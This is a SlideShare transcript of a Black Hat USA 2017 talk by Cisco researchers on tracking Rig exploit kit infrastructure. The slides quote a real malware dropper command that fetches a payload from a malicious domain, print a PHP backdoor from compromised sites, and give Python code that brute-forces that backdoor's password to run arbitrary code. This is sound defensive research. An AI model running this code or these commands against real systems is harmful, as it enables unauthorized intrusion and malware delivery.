Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Brad Antoniewicz
(statements and opinions do not represent the views of, or have been endorsed by, our employer)
Matt Fole...
2© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Speakers
Matt Foley
Intern @ Cisco Umbrella
C...
3© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Agenda
Background
Crawling
Amplifying Convict...
6© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
7© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Pseudo-Darkleech Campaign Using
Rig Exploit K...
8© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Exploit Kit
Script
Ransomware
, Trojan,
etc...
9© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
cmd.exe /q /c cd /d "%tmp%" && echo function ...
10© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Landing Page Injection
Compromised Site
Ad N...
11© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Filtering
Compromised Site
Ad Net. Subscribe...
12© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
13© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
14© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Exploit Delivery
Victim
Step 1.
Step 2.
Rend...
15© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
16© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Exploit Regurgitation
CVE-2015-8651 (Flash)
...
17© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
https://www.bleepstatic.com/swr-guides/h/hoe...
18© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
ektracker.com
Special thanks to @cyber_attac...
19© 2017 Cisco and/or its affiliates. All rights reserved. Cisco ConfidentialIP/ASN relationships
20© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Domains/Registrants
21© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraping
22© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraper V1 Orchestration
Domains in queue
Wo...
23© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraper V1 Worker
DOM
Query site twice, then...
24© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Popularity and Spike
Google.com
Lander
25© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proxy V1
BLOCKED
26© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraper V2
Candidate 1
EK Decoder
Module
Can...
27© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Decoder Module
Lander
Source and suspected
E...
28© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proxy V2
Rotating IPsChoice of regionSquid P...
29© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Sources for Scraping
ektracker.com
malware-t...
30© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
https://culturedcode.com/things/iphone/makin...
31© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
32© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Compromised Site: Unknown
Backend
Logs
Gate:...
33© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Conviction: Amplified!
S3 Lambda
if host in ...
34© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Teamwork makes the dream work
Scraper: Finds...
35© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Show graphic of detections!
Fancy D3 graph g...
36© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Backdoored
37© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Campaign Orchestration
Compromised Sites
pre...
38© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Backdoor Obfuscation and ‘Security’
$_passss...
39© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
'0a02419ec68460d4a320c53b680441ff'
40© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
$url = decrypt_url(‘a3d3czksLDIx………NDkyMzI7M...
41© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
/blog/?manchester&utm_source=82267:1021107:2...
42© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
/blog/?manchester&utm_source=82267:1021107:2...
43© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Backdoor access
pw = hashlib.md5(‘1021107’)....
44© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
nginx
Apache
Reasonable, but still good for ...
45© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Brute Forcing
data = { ‘a’: ‘//e’, ‘c’: ‘som...
46© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
POST Data
47© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Bypassing Filtering
Compromised Site
Staged ...
48© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Reliable EK Server Hosting
49© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Disposable Mailboxes
50© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Not good for research
51@brad_anton
52© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
MailRunnerIdentifying ransomware and commodi...
53© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Detections
(One mailbox)
7.4k Malicious Emai...
54© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
lacedmail.com
55© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Little Things
56© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
57© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
58© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Recap
Good for researchBad guy mistakes :)Am...
Exploit Kit Cornucopia - Blackhat USA 2017
Exploit Kit Cornucopia - Blackhat USA 2017
Exploit Kit Cornucopia - Blackhat USA 2017
Upcoming SlideShare
Loading in …5
×

Exploit Kit Cornucopia - Blackhat USA 2017

2,288 views

Published on

Matt Foley and Brad Antoniewicz - Detecting the compromised websites, gates, and dedicated hosts that make up the infrastructure used by Exploit Kits involves a variety of creative techniques. In this session, we will detail four approaches to uncovering these systems while explaining the underlying architecture of Exploit Kit networks. We will disclose a vulnerability in the injected code placed on compromised websites and exploit that vulnerability to uncover deeper infrastructure. Finally, we'll introduce a novel approach to obtaining the malware sent via phishing campaigns which is often the same result of an Exploit Kit compromise.

Note: This presentation contained embedded GIFs that do not animate in this release.

Published in: Internet
  • Hey guys! Who wants to chat with me? More photos with me here 👉 http://www.bit.ly/katekoxx
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Exploit Kit Cornucopia - Blackhat USA 2017

  1. 1. Brad Antoniewicz (statements and opinions do not represent the views of, or have been endorsed by, our employer) Matt Foley Exploit Kit Cornucopia
  2. 2. 2© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Speakers Matt Foley Intern @ Cisco Umbrella CS Major @ NYU Tandon Brad Antoniewicz Researcher @ Cisco Umbrella @brad_anton http://www.zenn.com.sg/Marketplace%20images/Speakers/Tannoy%20Berkeley%20speakers%20(2).JPG
  3. 3. 3© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Agenda Background Crawling Amplifying Convictions Backdoored Disposable Mailboxes http://fc06.deviantart.net/fs70/i/2013/248/4/3/bearshark_blueprints_wallpaper_1600x900_by_dangerousdeven-d6l544l.png
  4. 4. 6© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  5. 5. 7© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Pseudo-Darkleech Campaign Using Rig Exploit Kit
  6. 6. 8© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Kit Script Ransomware , Trojan, etc...
  7. 7. 9© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",…….x);j./**/run("cmd"+E+" /c "+x,0)}catch(_x){};q.Deletefile(K);>o32.tmp && start wscript //B //E:JScript o32.tmp "gexywoaxor" "http://free.fabuloussatchi.com/?qtuif=4979&q=[REDACTED]&ct=diamond&oq=[REDACTED]" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
  8. 8. 10© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Landing Page Injection Compromised Site Ad Net. Subscriber Staged Site (Ad) Victim Malvertising Compromised Site RIG Server Gets lander (proxy) Step 1.
  9. 9. 11© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Filtering Compromised Site Ad Net. Subscriber Staged Site (Ad) RIG Server Victim Malvertising Compromised Site Gets ‘proxy’ TDS/Crawler Filtering TDS TDS, Browser, IP, Region, Time Step 1.
  10. 10. 12© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  11. 11. 13© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  12. 12. 14© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Delivery Victim Step 1. Step 2. Render iframe Lander Virtual Dedicated Server (VDS) Gets exploit
  13. 13. 15© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  14. 14. 16© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Regurgitation CVE-2015-8651 (Flash) CVE-2015-0311 (Flash) CVE-2016-4117 (Flash) CVE-2016-0189 (IE) CVE-2015-2419 (IE)
  15. 15. 17© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://www.bleepstatic.com/swr-guides/h/hoeflertext/firefox/HoeflerText-font-missing-firefox.jpg http://www.malware-traffic-analysis.net/2017/02/22/2017-02-22-EITest-HoeflerText-Chrome-popup-image-04.jpg
  16. 16. 18© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential ektracker.com Special thanks to @cyber_attacks, @nao_sec, @ektracker, @executemalware
  17. 17. 19© 2017 Cisco and/or its affiliates. All rights reserved. Cisco ConfidentialIP/ASN relationships
  18. 18. 20© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Domains/Registrants
  19. 19. 21© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraping
  20. 20. 22© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Orchestration Domains in queue Worker Worker
  21. 21. 23© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Worker DOM Query site twice, then diff dom/source Requests source Filters
  22. 22. 24© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Popularity and Spike Google.com Lander
  23. 23. 25© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V1 BLOCKED
  24. 24. 26© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V2 Candidate 1 EK Decoder Module Candidate 2 Candidate 3 Browser (requests) Browser (requests) Detector Module
  25. 25. 27© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Decoder Module Lander Source and suspected EK passed to decoder EK Decoder Module Flash exploits, executables, etc. Decoder parses JS and identifies EK artifacts
  26. 26. 28© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V2 Rotating IPsChoice of regionSquid Proxy
  27. 27. 29© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sources for Scraping ektracker.com malware-traffic-analysis.net zerophagemalware.com broadanalysis.com malwarebreakdown.com Credit: @nao_sec (Where to get suspected exploit kit sites)
  28. 28. 30© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://culturedcode.com/things/iphone/makingof/List-02-Sketch.jpg https://s-media-cache-ak0.pinimg.com/736x/51/41/b1/5141b1839f3c8484cf510750044366f7.jpg Amplifying Convictions with Hitlist
  29. 29. 31© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  30. 30. 32© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Compromised Site: Unknown Backend Logs Gate: Known
  31. 31. 33© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Conviction: Amplified! S3 Lambda if host in eks: s3.put_object(...) Logs EK List Candidates Filter Convict
  32. 32. 34© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Teamwork makes the dream work Scraper: Finds Landers, Confirms HitList detections HitList: Finds compromised sites
  33. 33. 35© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Show graphic of detections! Fancy D3 graph goes here Gates to compromised sites
  34. 34. 36© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoored
  35. 35. 37© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Campaign Orchestration Compromised Sites preg_replace(‘/12/e’,$code,‘12’) nav-menu.php backdoor (pseudo-darkleech) Attacker eval()
  36. 36. 38© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor Obfuscation and ‘Security’ $_passssword = '0a02419ec68460d4a320c53b680441ff'; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); nav-menu.php backdoor
  37. 37. 39© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential '0a02419ec68460d4a320c53b680441ff'
  38. 38. 40© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential $url = decrypt_url(‘a3d3czksLDIx………NDkyMzI7MjA0OTEzMjA=’); nav-menu.php backdoor
  39. 39. 41© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid?
  40. 40. 42© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid? /blog/?manchester&utm_source=65857:1018137:2013 /blog/?manchester&utm_source=50426:1022174:2013 /blog/?manchester&utm_source=77620:1019894:2013 /blog/?manchester&utm_source=33398:1017062:2013
  41. 41. 43© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor access pw = hashlib.md5(‘1021107’).hexdigest() data = { pw: ‘preg_match’, ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } requests.post(compromised_site, data=data)
  42. 42. 44© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential nginx Apache Reasonable, but still good for us awwwyisssss
  43. 43. 45© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Brute Forcing data = { ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } for i in range(1010000, 1030000): pw = hashlib.md5(str(i)).hexdigest() data[pw] = ‘preg_match’ requests.post(compromised_site, data=data)
  44. 44. 46© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential POST Data
  45. 45. 47© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Bypassing Filtering Compromised Site Staged Site (Ad) RIG Server Request new gates, spoof UserAgent, Source IP, etc..
  46. 46. 48© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Reliable EK Server Hosting
  47. 47. 49© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Disposable Mailboxes
  48. 48. 50© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Not good for research
  49. 49. 51@brad_anton
  50. 50. 52© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential MailRunnerIdentifying ransomware and commodity malware Bait Mailboxes Block Dewey Classification Engine Convict, then pass on email attributes
  51. 51. 53© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Detections (One mailbox) 7.4k Malicious Emails 15k Unique Domains @brad_anton
  52. 52. 54© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential lacedmail.com
  53. 53. 55© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Little Things
  54. 54. 56© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  55. 55. 57© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  56. 56. 58© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Recap Good for researchBad guy mistakes :)Amplify convictionsRoll your own scraper/proxy

×